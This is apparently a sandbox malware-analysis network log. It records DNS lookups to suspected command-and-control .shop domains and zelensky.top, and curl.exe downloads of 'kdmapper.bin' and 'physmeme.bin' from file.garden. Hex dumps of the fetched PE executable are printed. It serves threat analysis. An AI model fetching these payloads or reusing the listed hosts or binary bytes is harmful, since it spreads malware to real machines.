Sep 30, 2024 18:19:16.904289961 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:16.904386997 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:16.909171104 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:16.909192085 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:17.609016895 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:17.609095097 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:17.612406969 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:17.612418890 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:17.612760067 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:17.665121078 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:17.749109983 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:17.795397997 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.148951054 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.149022102 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.149040937 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.149065971 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.149081945 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.149101019 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.149116993 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.149126053 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.149136066 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.149151087 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.149168968 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.237477064 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.237545967 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.237607956 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.237624884 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.237660885 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.237730980 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.239511013 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.239541054 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.239556074 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.239556074 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:19:18.239564896 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:19:18.239572048 CEST	443	49710	104.102.49.254	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:19:11.220010996 CEST	51495	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:11.233417034 CEST	53	51495	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.762079954 CEST	55029	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.774982929 CEST	53	55029	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.780191898 CEST	58540	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.790380955 CEST	53	58540	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.793556929 CEST	55461	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.805269003 CEST	53	55461	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.808005095 CEST	53563	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.817322969 CEST	53	53563	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.819789886 CEST	50741	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.830327988 CEST	53	50741	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.832659960 CEST	61329	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.842688084 CEST	53	61329	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.845072985 CEST	55758	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.855815887 CEST	53	55758	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.858484983 CEST	50670	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.868278980 CEST	53	50670	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.869632959 CEST	59161	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.887676001 CEST	53	59161	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:16.890495062 CEST	59646	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:16.897443056 CEST	53	59646	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:44.883356094 CEST	64897	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:44.892527103 CEST	53	64897	1.1.1.1	192.168.2.8
Sep 30, 2024 18:19:58.251636028 CEST	51096	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:19:58.468884945 CEST	53	51096	1.1.1.1	192.168.2.8
Sep 30, 2024 18:20:06.543725967 CEST	59967	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:20:06.637161016 CEST	53	59967	1.1.1.1	192.168.2.8
Sep 30, 2024 18:20:14.626483917 CEST	55875	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:20:14.715432882 CEST	53	55875	1.1.1.1	192.168.2.8
Sep 30, 2024 18:20:32.463187933 CEST	59921	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:20:32.673240900 CEST	53	59921	1.1.1.1	192.168.2.8
Sep 30, 2024 18:20:40.999475002 CEST	58847	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:20:41.330818892 CEST	53	58847	1.1.1.1	192.168.2.8
Sep 30, 2024 18:20:48.039678097 CEST	51149	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:20:48.134674072 CEST	53	51149	1.1.1.1	192.168.2.8
Sep 30, 2024 18:20:54.535640955 CEST	55661	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:20:54.626338959 CEST	53	55661	1.1.1.1	192.168.2.8
Sep 30, 2024 18:21:01.434288979 CEST	63852	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:21:01.524498940 CEST	53	63852	1.1.1.1	192.168.2.8
Sep 30, 2024 18:21:12.107844114 CEST	60964	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:21:12.117625952 CEST	53	60964	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:19:11.220010996 CEST	192.168.2.8	1.1.1.1	0x5976	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.762079954 CEST	192.168.2.8	1.1.1.1	0xf0e7	Standard query (0)	tiddymarktwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.780191898 CEST	192.168.2.8	1.1.1.1	0xb78f	Standard query (0)	surveriysiop.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.793556929 CEST	192.168.2.8	1.1.1.1	0xc58b	Standard query (0)	captainynfanw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.808005095 CEST	192.168.2.8	1.1.1.1	0x2afc	Standard query (0)	tearrybyiwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.819789886 CEST	192.168.2.8	1.1.1.1	0x10d	Standard query (0)	appleboltelwk.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.832659960 CEST	192.168.2.8	1.1.1.1	0x69b4	Standard query (0)	tendencerangej.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.845072985 CEST	192.168.2.8	1.1.1.1	0x58b6	Standard query (0)	fossillargeiw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.858484983 CEST	192.168.2.8	1.1.1.1	0xdd66	Standard query (0)	coursedonnyre.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.869632959 CEST	192.168.2.8	1.1.1.1	0xed88	Standard query (0)	strappystyio.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.890495062 CEST	192.168.2.8	1.1.1.1	0x10e4	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:44.883356094 CEST	192.168.2.8	1.1.1.1	0x36e	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:58.251636028 CEST	192.168.2.8	1.1.1.1	0xcbe7	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:06.543725967 CEST	192.168.2.8	1.1.1.1	0x530a	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:14.626483917 CEST	192.168.2.8	1.1.1.1	0x894c	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:32.463187933 CEST	192.168.2.8	1.1.1.1	0x1f9	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:40.999475002 CEST	192.168.2.8	1.1.1.1	0xcabc	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:48.039678097 CEST	192.168.2.8	1.1.1.1	0xe0d8	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:54.535640955 CEST	192.168.2.8	1.1.1.1	0x2872	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:01.434288979 CEST	192.168.2.8	1.1.1.1	0x2dad	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:12.107844114 CEST	192.168.2.8	1.1.1.1	0x5920	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:19:11.233417034 CEST	1.1.1.1	192.168.2.8	0x5976	No error (0)	file.garden		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:11.233417034 CEST	1.1.1.1	192.168.2.8	0x5976	No error (0)	file.garden		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.774982929 CEST	1.1.1.1	192.168.2.8	0xf0e7	Name error (3)	tiddymarktwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.790380955 CEST	1.1.1.1	192.168.2.8	0xb78f	Name error (3)	surveriysiop.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.805269003 CEST	1.1.1.1	192.168.2.8	0xc58b	Name error (3)	captainynfanw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.817322969 CEST	1.1.1.1	192.168.2.8	0x2afc	Name error (3)	tearrybyiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.830327988 CEST	1.1.1.1	192.168.2.8	0x10d	Name error (3)	appleboltelwk.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.842688084 CEST	1.1.1.1	192.168.2.8	0x69b4	Name error (3)	tendencerangej.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.855815887 CEST	1.1.1.1	192.168.2.8	0x58b6	Name error (3)	fossillargeiw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.868278980 CEST	1.1.1.1	192.168.2.8	0xdd66	Name error (3)	coursedonnyre.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.887676001 CEST	1.1.1.1	192.168.2.8	0xed88	Name error (3)	strappystyio.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:16.897443056 CEST	1.1.1.1	192.168.2.8	0x10e4	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:44.892527103 CEST	1.1.1.1	192.168.2.8	0x36e	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:58.468884945 CEST	1.1.1.1	192.168.2.8	0xcbe7	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:06.637161016 CEST	1.1.1.1	192.168.2.8	0x530a	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:14.715432882 CEST	1.1.1.1	192.168.2.8	0x894c	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:32.673240900 CEST	1.1.1.1	192.168.2.8	0x1f9	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:41.330818892 CEST	1.1.1.1	192.168.2.8	0xcabc	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:48.134674072 CEST	1.1.1.1	192.168.2.8	0xe0d8	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:54.626338959 CEST	1.1.1.1	192.168.2.8	0x2872	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:01.524498940 CEST	1.1.1.1	192.168.2.8	0x2dad	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:12.117625952 CEST	1.1.1.1	192.168.2.8	0x5920	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

steamcommunity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	188.114.96.3	443	3832	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:19:11 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:19:11 UTC	825	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:19:11 GMT Content-Type: application/octet-stream Content-Length: 2284739 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Fri, 20 Sep 2024 19:21:00 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 853070 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqjbsxCsZR94LyIBxFO1%2FP50aGTp%2B%2FDUqkADzL9P8nu9ag3cQH2DPkEgQ5re%2B0ZaRYJ%2BJfubS1%2BedC%2F5hdvSkkveRDZSn556Y8LcUTG2O%2FdwrpXumg9BVb2witEQbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb5887efa50c425-EWR
2024-09-30 16:19:11 UTC	544	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 75 08 b9 30 10 44 00 e8 3c cf 00 00 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 Data Ascii: u0D<2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 1f 38 86 dd 6c 00 00 75 0b 8d 46 32 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b Data Ascii: 8luF2Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2C
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 05 07 75 1c 8a 40 06 84 c0 75 04 6a 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 Data Ascii: u@uj<uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuP
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 04 00 00 83 7b 04 03 8b e9 75 0d 8b 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 Data Ascii: {uG+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: ff 15 78 32 43 00 8b cb ff d6 83 f8 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 Data Ascii: x2Ct3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 00 00 8d 85 d0 df ff ff 50 e8 4c 10 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 Data Ascii: PL@Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 15 78 32 43 00 8b cb ff d6 83 f8 10 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff Data Ascii: x2C!$auEktEkE(3PQx"EP!\|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"j
2024-09-30 16:19:11 UTC	1369	IN	Data Raw: 00 8d 4d 30 e8 0a 94 00 00 8d 4d 30 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d Data Ascii: M0M0F"3BF":uuN"""}dM`u@t2"#;rWPM0=h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	188.114.96.3	443	4424	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:19:14 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
